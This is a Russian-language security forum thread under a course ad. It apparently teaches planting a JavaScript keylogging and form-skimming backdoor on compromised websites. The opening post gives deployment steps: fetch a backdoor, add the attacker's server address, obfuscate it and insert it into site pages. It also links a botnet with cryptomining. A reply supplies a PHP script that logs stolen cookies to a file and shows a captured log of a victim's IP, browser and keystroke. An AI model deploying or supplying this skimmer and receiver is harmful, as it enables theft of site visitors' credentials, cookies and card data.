• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Javascript backdoor или как сайты следят за пользователями.

DefWolf

DefWolf

Green Team
24.10.2017
288
794
BIT
0
spies.jpg


482 сайта из топа Alex перехватывают, каждое нажатие клавиш, собирают информация о вашем браузере, ширине экрана, раскладки клавиатуры. Чтобы собирать о вас данные они используют javascript код. .По умолчанию скрипты этих компаний записывают все данные, которые пользователи вводят в различные формы, включая ФИО, email-адреса, телефонные номера, номера социального страхования, даты рождения. Более того, реальное число таких сайтов должно намного превышать изученные несколько сотен, так как ресурсы за пределами топ-50000 специалисты вообще не рассматривали.

Но на самом деле можно намного больше. Допустим на скомпрометированным сайте расположены форма регистрации, где просят указать, mail или телефон, само собой логин и пароль ну и допустим номер банковской карты. Так один разработчик вставил бэкдор в 20 000 сайтов. По данным полиции, с помощью своих бэкдоров разработчик похищал чужие пароли и юзернеймы, а затем использовал их, чтобы получить доступ к чужим аккаунтам в социальных сетях и почтовым ящикам. После злоумышленник убеждал друзей и близких своей жертвы перевести ему деньги. Также хакер регистрировал аккаунты на игорных сайтах, используя личные данные жертв, и совершал покупки в интернет-магазинах за чужой счет. Сообщается, что жертвами злоумышленника стали не только частные лица, но и ряд компаний.

Злоумышленник вставляет вредоносный javascript код, который собирает информацию из всех этих форм, записывает каждое нажатие клавиши и передает на удаленный сервер. Полученную информацию он может продать на каком-нибудь форуме. Такие данные стоят намного больше, чем допустим размещение рекламы на взломанном сайте. А если еще и улучшить бэкдор, то можно незаметно заражать каждую машину пользователя, собирать его cookie. Можно получить доступ к аккаунтам соц. сетям или дать ему zip-bomb. Zip-бомба, также известная как Архив Смерти или англ. decompression bomb— архивный файл, который по своей природе обладает разрушающим действием. При распаковке может вызвать крах системы. А теперь перейдем к практики.

Качаем отсюда бэкдор:
Ссылка скрыта от гостей
. Далее везде, где есть http:// дописываем адрес сервера куда передаваться данные. Обфусифицируем код и вставляем на страницу сайта. Проверить работу бэкдора можно самому перейдя на вредоносную страницу. Если все пройдет удачно, то на ваш сервер передастся информацию о вас.

Есть еще один бэкдор, т.е бот. Ссылка: https://github.com/4k-developer/4K-Botnet . Он более функционален и имеет возможность вставлять заголовки, майнить криптовалюту, убивать браузер и еще кучу интересностей.

Для борьбы со слежкой на сайтах есть плагин: ghostery .
 
  • Нравится
Реакции: AtlantWS, 111, Catharsis и ещё 13
Д

ДмитрийNZ

Green Team
22.01.2018
46
4
BIT
0
DefWolf сказал(а):
Посмотреть вложение 15560

482 сайта из топа Alex перехватывают, каждое нажатие клавиш, собирают информация о вашем браузере, ширине экрана, раскладки клавиатуры. Чтобы собирать о вас данные они используют javascript код. .По умолчанию скрипты этих компаний записывают все данные, которые пользователи вводят в различные формы, включая ФИО, email-адреса, телефонные номера, номера социального страхования, даты рождения. Более того, реальное число таких сайтов должно намного превышать изученные несколько сотен, так как ресурсы за пределами топ-50000 специалисты вообще не рассматривали.

Но на самом деле можно намного больше. Допустим на скомпрометированным сайте расположены форма регистрации, где просят указать, mail или телефон, само собой логин и пароль ну и допустим номер банковской карты. Так один разработчик вставил бэкдор в 20 000 сайтов. По данным полиции, с помощью своих бэкдоров разработчик похищал чужие пароли и юзернеймы, а затем использовал их, чтобы получить доступ к чужим аккаунтам в социальных сетях и почтовым ящикам. После злоумышленник убеждал друзей и близких своей жертвы перевести ему деньги. Также хакер регистрировал аккаунты на игорных сайтах, используя личные данные жертв, и совершал покупки в интернет-магазинах за чужой счет. Сообщается, что жертвами злоумышленника стали не только частные лица, но и ряд компаний.

Злоумышленник вставляет вредоносный javascript код, который собирает информацию из всех этих форм, записывает каждое нажатие клавиши и передает на удаленный сервер. Полученную информацию он может продать на каком-нибудь форуме. Такие данные стоят намного больше, чем допустим размещение рекламы на взломанном сайте. А если еще и улучшить бэкдор, то можно незаметно заражать каждую машину пользователя, собирать его cookie. Можно получить доступ к аккаунтам соц. сетям или дать ему zip-bomb. Zip-бомба, также известная как Архив Смерти или англ. decompression bomb— архивный файл, который по своей природе обладает разрушающим действием. При распаковке может вызвать крах системы. А теперь перейдем к практики.

Качаем отсюда бэкдор:
Ссылка скрыта от гостей
. Далее везде, где есть http:// дописываем адрес сервера куда передаваться данные. Обфусифицируем код и вставляем на страницу сайта. Проверить работу бэкдора можно самому перейдя на вредоносную страницу. Если все пройдет удачно, то на ваш сервер передастся информацию о вас.

Есть еще один бэкдор, т.е бот. Ссылка: https://github.com/4k-developer/4K-Botnet . Он более функционален и имеет возможность вставлять заголовки, майнить криптовалюту, убивать браузер и еще кучу интересностей.

Для борьбы со слежкой на сайтах есть плагин: ghostery .
Нажмите, чтобы раскрыть...
Довольно интересно
 
  • Нравится
Реакции: DefWolf
O

OneTrust

Green Team
11.05.2017
35
12
BIT
0
У кого-то получилось запустить первую утилиту? Какие логи приходят?
 
M

Max2

DefWolf сказал(а):
Обфусифицируем код и вставляем на страницу сайта
Нажмите, чтобы раскрыть...
можно поподробней на какой сайт(свой?) и чем и как обфусцировать?

---- Добавлено позже ----

DefWolf сказал(а):
адрес сервера куда передаваться данные
Нажмите, чтобы раскрыть...
что поднять надо на сервере?
 
Последнее редактирование модератором:
DefWolf

DefWolf

Green Team
24.10.2017
288
794
BIT
0
Max2 сказал(а):
можно поподробней на какой сайт(свой?) и чем и как обфусцировать?
Нажмите, чтобы раскрыть...
Допустим вот:
Ссылка скрыта от гостей
. Бэкдор вставляешь на зараженный сайт, а файл который будет принимать запросы на свой сервер или на другой зараженный сайт:
PHP: 
<?php
$cook = $_GET['cookie'];
if(isset($cook)){
file_put_contents('1.txt', $cook, FILE_APPEND);
}
?>
 
Последнее редактирование:
  • Нравится
Реакции: Max2
M

Max2

DefWolf сказал(а):
Допустим вот:
Ссылка скрыта от гостей
. Бэкдор вставляешь на зараженный сайт, а файл который будет принимать запросы на свой сервер или на другой зараженный сайт:
PHP: 
<?php
$cook = $_GET['cookie'];
if(isset(cook)){
file_put_contents('1.txt', $cook, FILE_APPEND);
}
?>
Нажмите, чтобы раскрыть...
спасибо
 
DefWolf

DefWolf

Green Team
24.10.2017
288
794
BIT
0
Max2 сказал(а):
какие логи приходят?
Нажмите, чтобы раскрыть...
Он записывает в файл 1.txt Информацию

---- Добавлено позже ----

Info: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});Win32Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36ruInfo: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});1

---- Добавлено позже ----

1 это клавиша которую я нажал
 
Последнее редактирование:
  • Нравится
Реакции: Max2
M

Max2

DefWolf сказал(а):
Он записывает в файл 1.txt Информацию

---- Добавлено позже ----

Info: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});Win32Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36ruInfo: ({"as":"AS14061 DigitalOcean, LLC","city":"Toronto","country":"Canada","countryCode":"CA","isp":"Digital Ocean","lat":43.6555,"lon":-79.3626,"org":"Digital Ocean","query":"138.197.174.154","region":"ON","regionName":"Ontario","status":"success","timezone":"America/Toronto","zip":"M5A"});1

---- Добавлено позже ----

1 это клавиша которую я нажал
Нажмите, чтобы раскрыть...
всё понятно СУПЕР
 
  • Нравится
Реакции: DefWolf
DefWolf

DefWolf

Green Team
24.10.2017
288
794
BIT
0
У Ondrik8 есть тема, где он использует Javascript + ActiveXObject("Shell.Application"), для загрузки бэкдора. Не забывай, что это уголовно наказуемо
 
Последнее редактирование:
  • Нравится
Реакции: erlan1749
H

Henrey Hamilton

New member
18.08.2019
3
0
BIT
0
Что-то я не могу понять, как с помощью js с фронта можно запускать zip бомбу, например?! Это ж надо выйти из песочницы браузера.
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ